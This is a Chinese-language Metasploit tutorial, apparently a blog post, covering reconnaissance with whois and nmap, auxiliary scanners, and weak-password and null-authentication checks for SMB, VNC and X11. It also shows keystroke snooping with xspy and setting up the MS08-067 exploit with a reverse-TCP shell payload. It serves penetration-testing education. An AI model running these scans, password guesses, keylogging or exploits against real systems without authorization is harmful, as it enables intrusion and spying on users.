如何黑掉一个宇宙？一文带你详解Meterpreter后渗透模块攻击（文末赠送免费资源哦~）

如何黑掉一个宇宙？一文带你详解Meterpreter后渗透模块攻击（文末赠送免费资源哦~）

文末赠送超级干货哈
一．名词解释
exploit
测试者利用它来攻击一个系统，程序，或服务，以获得开发者意料之外的结果。常见的
有内存溢出，网站程序漏洞利用，配置错误exploit。
payload
我们想让被攻击系统执行的程序，如reverse shell 可以从目标机器与测试者之间建立一
个反响连接，bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只
能在目标机器上执行有限命令的程序。
shellcode
是进行攻击时的一系列被当作payload 的指令，通常在目标机器上执行之后提供一个可
执行命令的shell。
module
MSF 的模块，由一系列代码组成。
listener
等待来自被攻击机器的incoming 连接的监听在测试者机器上的程序

二. 编码器
msfencode –l 查看可用的编码器（encoders），效果最佳的是x86/shikata_ga_nai

三．信息刺探与收集
1、攻击第一步：基础信息收集
①whois 查询：
msf > whois example.com
msf> whois 192.168.1.100

②在线手机服务器IP工具

③nslookup
set type=mx
example.com

2、用nmap 探测开放端口和服务：

-sS SYN 半开扫描
-sT TCP 半开扫描
-Pn 不使用ping方式探测主机
-A 探测服务类型
-6 开启IPV6 扫描
-O 探测操作系统版本

常用扫描参数组合：
nmap –sS –Pn 192.168.0.111
nmap –sS –Pn –A 192.168.0.111

3、MSF 与postgresql 协同工作
/etc/init.d/postgreql-8.3 start
msf> db_connect postgres:toor@127.0.0.1/msf
msf> db_status
导入nmap 扫描的结果：
nmap –sS –Pn –A –oX Subnet1 192.168.1.0/24 # -oX 扫描结果导出为Subnet1.xml
msf> db_import Subnet1.xml
msf> db_hosts –c address #查看导入的主机IP
（msf 也可以和mysql 一起工作，在bt5 r1 中msf 默认支持连接mysql：
msf> db_driver mysql
msf> db_connect root:toor@127.0.0.1/msf3 #连接本机mysql 的msf3 数据库
mysql 默认密码toor，使用db_connect 连接时会自动创建msf3 库）

4、高级扫描方式：
①msf> use auxiliary/scanner/ip/ipidseq #IPID 序列扫描器，与nmap 的-sI -O 选项类似
show options
set RHOSTS 192.168.1.0/24
set RPORT 8080
set THREADS 50
run
（RHOSTS、RPORT 等参数也可以用小写）
②msf> nmap –PN –sI 192.168.1.09 192.168.1.155
③nmap 连接数据库：
msf> db_connect postgres:toor@127.0.0.1/msf
msf> db_nmap –sS –A 192.168.1.111
msf> db_services #查看扫描结果
④使用portscan 模块：
msf> search postscan
msf> use scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run

5、特定扫描：
smb_version 模块：
msf> use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
db_hosts –c address,os_flavor
查找mssql 主机：
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
SSH 服务器扫描：
msf> use auxiliary/scanner/ssh/ssh_version
set THREADS 50
run
FTP 主机扫描：
msf> use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
扫描FTP 匿名登录：
use auxiliary/scanner/ftp/anonymos
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫描SNMP 主机：
msf> use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set THREADS 50
run

四．基本漏洞扫描
1、使用nc 与目标端口通信，获取目标端口的信息：
nc 192.168.1.111 80
GET HTTP 1/1
Server: Microsoft-IIS/5.1
（1：还有一个功能与nc 类似的工具Ncat，产自nmap 社区，可实现相同功能：
ncat -C 192.168.1.111 80
GET / HTTP/1.0

2：题外：ncat 还可以做聊天服务器呢！在服务器端监听然后多个客户端直接连上就
可以聊天了：服务器（chatserver）：ncatncat -l –chat 其他客户端：ncat chatserver

3：ncat 还可以用来查看各种客户端的请求信息，比如论坛里有人问中国菜刀有木有后门，那么可以这样查看中国菜刀连接后门时发送的数据：
服务器（server.example.com）上：ncat -l –keep-open 80 –output caidao.log > /dev/null
然后使用菜刀连接http://server.example.com/nc.php 并请求操作，这是菜刀发送的数据就保存到服务器的caidao.log 里面了。也可以导出为hex 格式，–output 换为–hex-dump就可以了。

4：其实与nc 功能类似的工具在bt5 里面还有很多，比如还有一个sbd：
监听：sbd -l -p 12345
连接：sbd 192.168.1.111 12345

5：当然也可以用来聊天，与ncat 的不同之处在于ncat 自动对用户编号user1、user2、…，
而sbd 可以自定义昵称，且不需要专门单独监听为聊天服务器：
pc1：sbd -l -p 12345 -P chowner
pc2：sbd pc1 12345 -P evil

6：其实nc 也可以用来聊天的：
pc1：nc -l -p 12345
pc2:telnet pc1 12345）

3、与nessus 结合扫描：
使用Nessus 扫描完成后生成.nessus 格式的报告，导入到MSF：
db_connect postgres:toor@127.0.0.1/msf
db_import /tmp/nessus_report_Host_test.nessus
db_hosts –c address,svcs,vulns
db_vulns
在MSF 中使用Nessus：
db_connect postgres:toor@127.0.0.1/msf
load nessus
nessus_connect nessus:toor@192.168.1.111:8834 ok
nessus_policy_list #查看存在的扫描规则
nessus_scan_new 2 bridge_scan 192.168.1.111 #2 表示规则的ID 号，bridge_scan 自定义扫描名称
nessus_scan_status #查看扫描进行状态
nessus_report_list #查看扫描结果
nessus_report_get skjla243-3b5d-* #导入报告
db_hosts –c address,svcs,vulns

4、特殊扫描：
SMB 弱口令:
msf> use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.111-222
set SMBUser Administrator
set SMBPass admin
run
VNC 空口令：
msf> use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS 192.168.1.111
run
Open X11 空口令：
msf> use auxiliary/scanner/x11/open_x11
set RHOST 192.168.1.0/24
set THREADS 50
run
当扫描到此漏洞的主机后可以使用xspy 工具来监视对方的键盘输入：
cd /pentest/sniffers/xspy/
./xspy –display 192.168.1.125:0 –delay 100
（xspy 这货在bt5 r1 里面貌似木有了）

五．基础溢出命令
1、基本命令：
查看可用溢出模块show exploits
查看辅助模块show auxiliary 包括扫描器，拒绝服务模块，fuzzer 工具或其他。
查看可用选项show options
加载模块后退出此模块back
例子：
msf> use windows/smb/ms08_067_netapi
back
搜索模块search
例子： searh mssql search ms08_067
查看当前模块可用的payload： show payloads
例子：
use windows/smb/ms08_067_netapi
show payloads
set payload windows/shell/reverse_tcp
show options
查看可选的目标类型show targets
查看更多信息info
设置一个选项或取消设置set/unset
设置或取消全局选项setg/unsetg 例如设置LHOST 就可以用setg，避免后面重复设置
保存全局选项的设置save 当下次启动仍然生效
查看建立的session sess